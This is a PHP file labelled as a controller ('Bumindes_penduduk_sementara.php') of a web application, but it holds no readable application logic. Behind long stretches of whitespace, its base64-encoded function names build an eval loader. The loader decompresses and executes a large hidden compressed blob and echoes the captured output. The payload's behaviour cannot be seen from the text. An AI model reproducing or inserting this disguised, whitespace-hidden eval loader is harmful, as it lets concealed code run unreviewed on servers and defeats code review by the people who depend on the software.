<?php 
        $__='printf';$_='Loading donjo-app/controllers/Bumindes_penduduk_sementara.php';
        























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































































































                                                                                                                                                                                                                     $________;
